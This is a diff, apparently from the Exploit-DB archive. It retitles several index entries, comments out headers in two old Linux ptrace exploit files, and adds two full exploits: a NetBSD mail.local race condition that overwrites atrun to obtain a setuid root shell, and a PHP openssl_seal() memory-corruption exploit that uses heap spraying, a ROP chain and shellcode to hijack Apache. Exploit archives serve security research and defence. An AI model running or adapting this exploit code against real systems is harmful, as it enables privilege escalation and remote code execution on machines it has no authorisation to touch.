 39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0
@@ -36173,7 +36173,7 @@ id,file,description,date,author,platform,type,port
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
-40054,platforms/linux/local/40054.c,"Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
+40054,platforms/linux/local/40054.c,"Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation",2016-07-04,halfdog,linux,local,0
 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@@ -36269,7 +36269,7 @@ id,file,description,date,author,platform,type,port
 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
-40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
+40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
 40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
@@ -36277,10 +36277,10 @@ id,file,description,date,author,platform,type,port
 40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
-40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
+40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
-40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
@@ -36297,3 +36297,5 @@ id,file,description,date,author,platform,type,port
 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)",2016-07-21,CripSlick,lin_x86-64,shellcode,0
 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
+40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
+40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0

platforms/bsd/local/40141.c

@@ -0,0 +1,220 @@
+// Source: http://akat1.pl/?id=2
+
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <string.h>
+#include <err.h>
+#include <sys/wait.h>
+
+#define ATRUNPATH "/usr/libexec/atrun"
+#define MAILDIR "/var/mail"
+
+static int
+overwrite_atrun(void)
+{
+        char *script = "#! /bin/sh\n"
+            "cp /bin/ksh /tmp/ksh\n"
+            "chmod +s /tmp/ksh\n";
+        size_t size;
+        FILE *fh;
+        int rv = 0;
+
+        fh = fopen(ATRUNPATH, "wb");
+
+        if (fh == NULL) {
+                rv = -1;
+                goto out;
+        }
+
+        size = strlen(script);
+        if (size != fwrite(script, 1, strlen(script), fh)) {
+                rv =  -1;
+                goto out;
+        }
+
+out:
+        if (fh != NULL && fclose(fh) != 0)
+                rv = -1;
+
+        return rv;
+}
+
+static int
+copy_file(const char *from, const char *dest, int create)
+{
+        char buf[1024];
+        FILE *in = NULL, *out = NULL;
+        size_t size;
+        int rv = 0, fd;
+
+        in = fopen(from, "rb");
+        if (create == 0)
+                out = fopen(dest, "wb");
+        else {
+                fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR |
+                    S_IWUSR);
+                if (fd == -1) {
+                        rv = -1;
+                        goto out;
+                }
+                out = fdopen(fd, "wb");
+        }
+
+        if (in == NULL || out == NULL) {
+                rv = -1;
+                goto out;
+        }
+
+        while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
+                if (fwrite(&buf, 1, size, in) != 0) {
+                        rv = -1;
+                        goto out;
+                }
+        }
+
+out:
+        if (in != NULL && fclose(in) != 0)
+                rv = -1;
+        if (out != NULL && fclose(out) != 0)
+                rv = -1;
+        
+        return rv;
+}
+
+int
+main()
+{
+        pid_t pid;
+        uid_t uid;
+        struct stat sb;
+        char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
+
+        umask(0077);
+
+        login = getlogin();
+
+        if (login == NULL)
+                err(EXIT_FAILURE, "who are you?");
+
+        uid = getuid();
+
+        asprintf(&mailbox, MAILDIR "/%s", login);
+
+        if (mailbox == NULL)
+                err(EXIT_FAILURE, NULL);
+
+        if (access(mailbox, F_OK) != -1) {
+                /* backup mailbox */
+                asprintf(&mailbox_backup, "/tmp/%s", login);
+                if (mailbox_backup == NULL)
+                        err(EXIT_FAILURE, NULL);
+        }
+
+        if (mailbox_backup != NULL) {
+                fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox,
+                    mailbox_backup);
+
+                if (copy_file(mailbox, mailbox_backup, 1))
+                        err(EXIT_FAILURE, "[-] failed");
+        }
+
+        /* backup atrun(1) */
+        atrun_backup = strdup("/tmp/atrun");
+        if (atrun_backup == NULL)
+                err(EXIT_FAILURE, NULL);
+
+        fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH,
+            atrun_backup);
+
+        if (copy_file(ATRUNPATH, atrun_backup, 1))
+                err(EXIT_FAILURE, "[-] failed");
+
+        /* win the race */
+        fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
+
+        switch (pid = fork()) {
+        case -1:
+                err(EXIT_FAILURE, NULL);
+                /* NOTREACHED */
+
+        case 0:
+                asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
+                    "2> /dev/null", login);
+
+                for(;;)
+                        system(buf);
+                /* NOTREACHED */
+
+        default:
+                umask(0022);
+                for(;;) {
+                        int fd;
+                        unlink(mailbox);
+                        symlink(ATRUNPATH, mailbox);
+                        sync();
+                        unlink(mailbox);
+                        fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
+                        close(fd);
+                        sync();
+                        if (lstat(ATRUNPATH, &sb) == 0) {
+                                if (sb.st_uid == uid) {
+                                        kill(pid, 9);
+                                        fprintf(stderr, "[+] won race!\n");
+                                        break;
+                                }
+                        }
+                }
+                break;
+        }
+        (void)waitpid(pid, NULL, 0);
+
+        if (mailbox_backup != NULL) {
+                /* restore mailbox */
+                fprintf(stderr, "[+] restore mailbox %s to %s\n",
+                    mailbox_backup, mailbox);
+
+                if (copy_file(mailbox_backup, mailbox, 0))
+                        err(EXIT_FAILURE, "[-] failed");
+                if (unlink(mailbox_backup) != 0)
+                        err(EXIT_FAILURE, "[-] failed");
+        }
+
+        /* overwrite atrun */
+        fprintf(stderr, "[+] overwriting atrun(1)\n");
+
+        if (chmod(ATRUNPATH, 0755) != 0)
+                err(EXIT_FAILURE, NULL);
+
+        if (overwrite_atrun())
+                err(EXIT_FAILURE, NULL);
+
+        fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
+
+        for(;;sleep(1)) {
+                if (access("/tmp/ksh", F_OK) != -1)
+                        break;
+        }
+
+        /* restore atrun */
+        fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup,
+            ATRUNPATH);
+
+        if (copy_file(atrun_backup, ATRUNPATH, 0))
+                err(EXIT_FAILURE, "[-] failed");
+        if (unlink(atrun_backup) != 0)
+                err(EXIT_FAILURE, "[-] failed");
+
+        if (chmod(ATRUNPATH, 0555) != 0)
+                err(EXIT_FAILURE, NULL);
+
+        fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
+            "ownership.\n");
+        fprintf(stderr, "Enjoy your shell:\n");
+
+        execl("/tmp/ksh", "ksh", NULL);
+
+        return 0;
+}

platforms/linux/local/22362.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/7112/info
 
 A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@@ -5,6 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
 The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
 
 This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
+*/
 
 /* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
  * 2.2 and 2.4

platforms/linux/local/22363.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/7112/info
  
 A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@@ -5,7 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
 The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
  
 This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
-
+*/
 
 /*
  *  Author: snooq [http://www.angelfire.com/linux/snooq/]

platforms/php/remote/40142.php

@@ -0,0 +1,205 @@
+<?php
+
+// Source: http://akat1.pl/?id=1
+
+function get_maps() {
+        $fh = fopen("/proc/self/maps", "r");
+        $maps = fread($fh, 331337);
+        fclose($fh);
+        return explode("\n", $maps);
+}
+
+function find_map($sym) {
+    $addr = 0;
+    foreach(get_maps() as $record)
+        if (strstr($record, $sym) && strstr($record, "r-xp")) {
+            $addr = hexdec(explode('-', $record)[0]);
+            break;
+        }
+
+    if ($addr == 0)
+            die("[-] can't find $sym base, you need an information leak :[");
+
+    return $addr;
+}
+
+function fill_buffer($offset, $content) {
+    global $buffer;
+    for ($i = 0; $i < strlen($content); $i++)
+        $buffer[$offset + $i] = $content[$i];
+    return;
+}
+
+$pre = get_maps();
+$buffer = str_repeat("\x00", 0xff0000);
+$post = get_maps();
+
+$tmp = array_diff($post, $pre);
+
+if (count($tmp) != 1)
+        die('[-] you need an information leak :[');
+
+$buffer_base = hexdec(explode('-',array_values($tmp)[0])[0]);
+$addr = $buffer_base+0x14; /* align to string */
+
+echo "[+] buffer string @ 0x".dechex($addr)."\n";
+
+$align = 0xff;
+$addr += $align;
+
+echo "[+] faking EVP_PKEY @ 0x".dechex($addr)."\n";
+echo "[+] faking ASN @ 0x".dechex($addr)."\n";
+fill_buffer($align + 12, pack('P', $addr));
+
+$libphp_base = find_map("libphp7");
+echo "[+] libphp7 base @ 0x".dechex($libphp_base)."\n";
+
+/* pop x ; pop rsp ; ret - stack pivot */
+$rop_addr = $libphp_base + 0x00000000004a79c3;
+echo "[+] faking pkey_free @ 0x".dechex($addr+0xa0-4)." = ".dechex($rop_addr)."\n";
+fill_buffer($align + 0xa0 - 4, pack('P', $rop_addr));
+
+/* pop rbp ; pop rbp ; ret - clean up the stack after pivoting */
+$rop_addr = $libphp_base + 0x000000000041d583;
+fill_buffer($align - 4, pack('P', $rop_addr));
+
+$libc_base = find_map("libc-");
+echo "[+] libc base @ 0x".dechex($libc_base)."\n";
+
+$mprotect_offset = 0xf4a20;
+$mprotect_addr = $libc_base + $mprotect_offset;
+echo "[+] mprotect @ 0x".dechex($mprotect_addr)."\n";
+
+$mmap_offset = 0xf49c0;
+$mmap_addr = $libc_base + $mmap_offset;
+echo "[+] mmap @ 0x".dechex($mmap_addr)."\n";
+
+$apache2_base = find_map("/usr/sbin/apache2");
+echo "[+] apache2 base @ 0x".dechex($apache2_base)."\n";
+
+$ap_rprintf_offset = 0x429c0;
+$ap_rprintf_addr = $apache2_base + $ap_rprintf_offset;
+echo "[+] ap_rprintf @ 0x".dechex($ap_rprintf_addr)."\n";
+
+$ap_hook_quick_handler_offset = 0x56c00;
+$ap_hook_quick_handler_addr = $apache2_base + $ap_hook_quick_handler_offset;
+echo "[+] ap_hook_quick_handler @ 0x".dechex($ap_hook_quick_handler_addr)."\n";
+
+echo "[+] building ropchain\n";
+$rop_chain =
+        pack('P', $libphp_base + 0x00000000000ea107) .  // pop rdx ; ret
+        pack('P', 0x0000000000000007) .                 // rdx = 7
+        pack('P', $libphp_base + 0x00000000000e69bd) .  // pop rsi ; ret
+        pack('P', 0x0000000000004000) .                 // rsi = 0x1000
+        pack('P', $libphp_base + 0x00000000000e5fd8) .  // pop rdi ; ret
+        pack('P', $addr ^ ($addr & 0xffff)) .           // rdi = page aligned addr
+        pack('P', $mprotect_addr) .                     // mprotect addr
+        pack('P', ($addr ^ ($addr & 0xffff)) | 0x10ff); // return to shellcode_stage1
+fill_buffer($align + 0x14, $rop_chain);
+
+$shellcode_stage1 = str_repeat("\x90", 512) .
+        "\x48\xb8" . pack('P', $buffer_base + 0x2018) .         // movabs shellcode_stage2, %rax
+        "\x49\xb8" . pack('P', 0x1000) .                        // handler size
+        "\x48\xb9" . pack('P', $buffer_base + 0x3018) .         // handler
+        "\x48\xba" . pack('P', $ap_hook_quick_handler_addr) .   // movabs ap_hook_quick_handler, %rdx
+        "\x48\xbe" . pack('P', 0) .                             // UNUSED
+        "\x48\xbf" . pack('P', $mmap_addr) .                    // movabs mmap,%rdi
+        "\xff\xd0" .                                            // callq %rax
+        "\xb8\x27\x00\x00\x00" .                                // mov $0x27,%eax - getpid syscall
+        "\x0f\x05" .                                            // syscall
+        "\xbe\x1b\x00\x00\x00" .                                // mov $0xd,%esi - SIGPROF
+        "\x89\xc7" .                                            // mov %eax,%edi - pid
+        "\xb8\x3e\x00\x00\x00" .                                // mov $0x3e,%eax  - kill syscall
+        "\x0f\x05";                                             // syscall
+fill_buffer(0x1000, $shellcode_stage1);
+
+$shellcode_stage2 = str_repeat("\x90", 512) .
+        "\x55" .                        // push   %rbp
+        "\x48\x89\xe5" .                // mov    %rsp,%rbp
+        "\x48\x83\xec\x40" .            // sub    $0x40,%rsp
+        "\x48\x89\x7d\xe8" .            // mov    %rdi,-0x18(%rbp)
+        "\x48\x89\x75\xe0" .            // mov    %rsi,-0x20(%rbp)
+        "\x48\x89\x55\xd8" .            // mov    %rdx,-0x28(%rbp)
+        "\x48\x89\x4d\xd0" .            // mov    %rcx,-0x30(%rbp)
+        "\x4c\x89\x45\xc8" .            // mov    %r8,-0x38(%rbp)
+        "\x48\x8b\x45\xe8" .            // mov    -0x18(%rbp),%rax
+        "\x41\xb9\x00\x00\x00\x00" .    // mov    $0x0,%r9d
+        "\x41\xb8\xff\xff\xff\xff" .    // mov    $0xffffffff,%r8d
+        "\xb9\x22\x00\x00\x00" .        // mov    $0x22,%ecx
+        "\xba\x07\x00\x00\x00" .        // mov    $0x7,%edx
+        "\xbe\x00\x20\x00\x00" .        // mov    $0x2000,%esi
+        "\xbf\x00\x00\x00\x00" .        // mov    $0x0,%edi
+        "\xff\xd0" .                    // callq  *%rax
+        "\x48\x89\x45\xf0" .            // mov    %rax,-0x10(%rbp)
+        "\x48\x8b\x45\xf0" .            // mov    -0x10(%rbp),%rax
+        "\x48\x89\x45\xf8" .            // mov    %rax,-0x8(%rbp)
+        "\xeb\x1d" .                    // jmp    0x40063d <shellcode+0x6d>
+        "\x48\x8b\x45\xf8" .            // mov    -0x8(%rbp),%rax
+        "\x48\x8d\x50\x01" .            // lea    0x1(%rax),%rdx
+        "\x48\x89\x55\xf8" .            // mov    %rdx,-0x8(%rbp)
+        "\x48\x8b\x55\xd0" .            // mov    -0x30(%rbp),%rdx
+        "\x48\x8d\x4a\x01" .            // lea    0x1(%rdx),%rcx
+        "\x48\x89\x4d\xd0" .            // mov    %rcx,-0x30(%rbp)
+        "\x0f\xb6\x12" .                // movzbl (%rdx),%edx
+        "\x88\x10" .                    // mov    %dl,(%rax)
+        "\x48\x8b\x45\xc8" .            // mov    -0x38(%rbp),%rax
+        "\x48\x8d\x50\xff" .            // lea    -0x1(%rax),%rdx
+        "\x48\x89\x55\xc8" .            // mov    %rdx,-0x38(%rbp)
+        "\x48\x85\xc0" .                // test   %rax,%rax
+        "\x75\xd2" .                    // jne    0x400620 <shellcode+0x50>
+        "\x48\x8b\x7d\xf0" .            // mov    -0x10(%rbp),%rdi
+        "\x48\x8b\x45\xd8" .            // mov    -0x28(%rbp),%rax
+        "\xb9\xf6\xff\xff\xff" .        // mov    $0xfffffff6,%ecx
+        "\xba\x00\x00\x00\x00" .        // mov    $0x0,%edx
+        "\xbe\x00\x00\x00\x00" .        // mov    $0x0,%esi
+        "\xff\xd0" .                    // callq  *%rax
+        "\xc9" .                        // leaveq
+        "\xc3";                         // retq
+fill_buffer(0x2000, $shellcode_stage2);
+
+$handler =
+        "\x55" .                                    // push   %rbp
+        "\x48\x89\xe5" .                            // mov    %rsp,%rbp
+        "\x48\x83\xec\x30" .                        // sub    $0x30,%rsp
+        "\x48\x89\x7d\xd8" .                        // mov    %rdi,-0x28(%rbp)
+        "\x48\xb8" . pack('P', $ap_rprintf_addr) .  // movabs $0xdeadbabefeedcafe,%rax
+        "\x48\x89\x45\xf8" .                        // mov    %rax,-0x8(%rbp)
+        "\x48\xb8" . "Hello Wo" .                   // movabs CONTENT,%rax
+        "\x48\x89\x45\xe0" .                        // mov    %rax,-0x20(%rbp)
+        "\x48\xb8" . "rld!\n\x00\x00\x00" .         // movabs CONTENT,%rax
+        "\x48\x89\x45\xe8" .                        // mov    %rax,-0x20(%rbp)
+        "\x48\x8d\x4d\xe0" .                        // lea    -0x20(%rbp),%rcx
+        "\x48\x8b\x55\xd8" .                        // mov    -0x28(%rbp),%rdx
+        "\x48\x8b\x45\xf8" .                        // mov    -0x8(%rbp),%rax
+        "\x48\x89\xce" .                            // mov    %rcx,%rsi
+        "\x48\x89\xd7" .                            // mov    %rdx,%rdi
+        "\xff\xd0" .                                // callq  *%rax
+        "\xb8\x00\x00\x00\x00" .                    // mov    $0x0,%eax
+        "\xc9" .                                    // leaveq
+        "\xc3";                                     // retq
+fill_buffer(0x3000, $handler);
+
+$addr = pack('P', $addr);
+$memory = str_repeat($addr,321);
+
+$pem = "
+-----BEGIN PUBLIC KEY-----
+MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
+-----END PUBLIC KEY-----"; /* Random RSA key */
+
+$a = array_fill(0,321,0);
+/* place valid keys at the beginning */ 
+$k = openssl_pkey_get_public($pem);
+$a[0] = $k; $a[1] = $k; $a[2] = $k;
+echo "[+] spraying heap\n";
+$x = array();
+for ($i = 0 ; $i < 20000 ; $i++) {
+        $x[$i] = str_repeat($memory, 1);
+}
+for ($i = 0 ; $i < 20000 ; $i++) {
+        unset($x[$i]);
+}
+unset($x);
+echo "[+] triggering openssl_seal()...\n";
+@openssl_seal($_, $_, $_, $a);
+echo "[-] failed ;[\n";